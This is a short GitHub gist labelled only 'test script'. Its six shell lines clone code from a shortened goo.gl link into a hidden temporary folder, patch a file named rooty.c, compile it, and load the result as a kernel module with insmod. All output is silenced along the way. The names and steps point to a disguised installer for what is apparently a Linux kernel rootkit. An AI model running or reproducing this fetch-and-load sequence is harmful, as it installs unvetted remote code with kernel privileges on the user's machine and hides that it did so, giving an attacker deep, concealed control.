-
-
Save blaedj/637cfe331c5d8e20f223 to your computer and use it in GitHub Desktop.
test script
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
git clone http://goo.gl/cgu5WR .tmp9y3/ > /dev/null | |
cwd=$(pwd) | |
cd .tmp9y3/ | |
sed -i 's/\.TEST/${cwd}/g' rooty.c > /dev/null | |
make all > /dev/null/ | |
insmod rooty.ko > /dev/null/ |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment